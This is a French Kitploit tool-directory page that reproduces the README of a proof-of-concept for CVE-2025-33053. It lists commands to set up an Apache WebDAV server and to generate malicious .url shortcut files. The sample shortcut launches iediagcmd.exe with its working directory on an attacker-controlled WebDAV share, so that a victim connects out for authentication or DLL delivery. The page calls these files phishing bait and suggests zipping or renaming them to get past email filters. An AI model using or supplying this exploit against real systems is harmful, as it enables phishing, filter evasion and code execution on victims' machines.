Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Outils/GitHubGitHub/devbuihieu/cve-2025-33053-proof-of-concept
Génération de PayloadsExploitationMouvement LatéralHameçonnageSécurité WebTests d'IntrusionCommandement et ContrôleIngénierie SocialeRed Teaming
GitHubdevbuihieu/cve-2025-33053-proof-of-concept

CVE-2025-33053-Proof-Of-Concept

CVE-2025-33053 Preuve de concept (PoC)

Voir le dépôt
64164il y a 1 anVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-33053 Preuve de concept

Ce dépôt fournit des scripts pour déployer automatiquement un serveur WebDAV sur Ubuntu avec Apache2, et générer des fichiers de raccourci .url malveillants destinés au phishing, au red teaming ou à la simulation de mouvement latéral.


📁 Contenu

  • setup_webdav.sh – Script Bash pour configurer Apache2 + WebDAV.
  • setup_webdav.py – Version Python du script précédent.
  • gen_url.py – Script Python pour générer des fichiers de raccourci .url avec des chemins UNC/WebDAV.
  • README.md – Documentation.

🔧 Prérequis

  • OS : Ubuntu 20.04 ou plus récent (compatible Debian)
  • Privilèges root ()
sudo
  • Python 3.x

  • 🚀 Instructions d'installation

    1. Serveur WebDAV (via Bash)

    root@kitploit:~
    sudo bash setup_webdav.sh
    

    Ou avec Python :

    root@kitploit:~
    sudo python3 setup_webdav.py
    

    Par défaut, le script va :

    • Installer Apache et les modules WebDAV requis.
    • Créer un répertoire partagé dans /var/www/webdav.
    • Activer les modules DAV et DAV_FS.
    • Créer un répertoire DavLockDB (pour éviter les erreurs de verrouillage DAV d'Apache).
    • Redémarrer le service Apache.

    📎 Chemin WebDAV : http://<votre-ip>/webdav/


    💣 Génération d'un raccourci .url malveillant

    Exemple d'utilisation :

    root@kitploit:~
    python3 gen_url.py --ip 192.168.1.100 --out doc.url
    

    Toutes les options :

    root@kitploit:~
    python3 gen_url.py \
      --ip 《YOUR IP ADDRESS》\
      --share 《YOUR SHARE NAME》(Default: webdav) \
      --out 《YOUR OUTPUT FILENAME.url》(Default: bait.url) \
      --exe "C:\Program Files\Internet Explorer\iediagcmd.exe" \
      --icon "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe" \
      --index 13 \
      --modified 20F06BA06D07BD014D
    

    Cela créera un fichier .url comme celui-ci :

    root@kitploit:~
    [InternetShortcut]
    URL=C:\Program Files\Internet Explorer\iediagcmd.exe
    WorkingDirectory=\\192.168.1.100\webdav\
    ShowCommand=7
    IconIndex=13
    IconFile=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    Modified=20F06BA06D07BD014D
    

    📌 Cliquer sur ce fichier (dans certaines configurations) peut amener le système cible à se connecter automatiquement à votre serveur WebDAV (authentification ou livraison de DLL).


    🔒 Remarques pour les tests de sécurité

    • Désactivez le pare-feu (ou ouvrez le port 80) si vous testez sur un réseau local :
      root@kitploit:~
      sudo ufw allow 80
      
    • Les fichiers .url peuvent ne pas s'exécuter comme prévu selon :
      • Les restrictions de la stratégie de groupe
      • Les applications par défaut
      • Le client email (Gmail peut les nettoyer)
    • Vous devrez peut-être zipper ou renommer .url en .txt pour contourner les filtres.

    ⚠️ Avertissement légal

    Ce dépôt est destiné uniquement à des tests de pénétration éducatifs et autorisés.
    N'utilisez pas ces scripts contre des systèmes dont vous n'êtes pas propriétaire ou pour lesquels vous n'avez pas l'autorisation de tester.


    🧠 Références

    • Configuration du serveur WebDAV - LinuxConfig.org
    • Configuration Apache WebDAV - Peter Girnus
    • Documentation Microsoft WebDAV

    📬 Contact

    Pour toute question ou demande de red teaming éthique, contactez-nous via les issues GitHub.

    Télécharger l’outil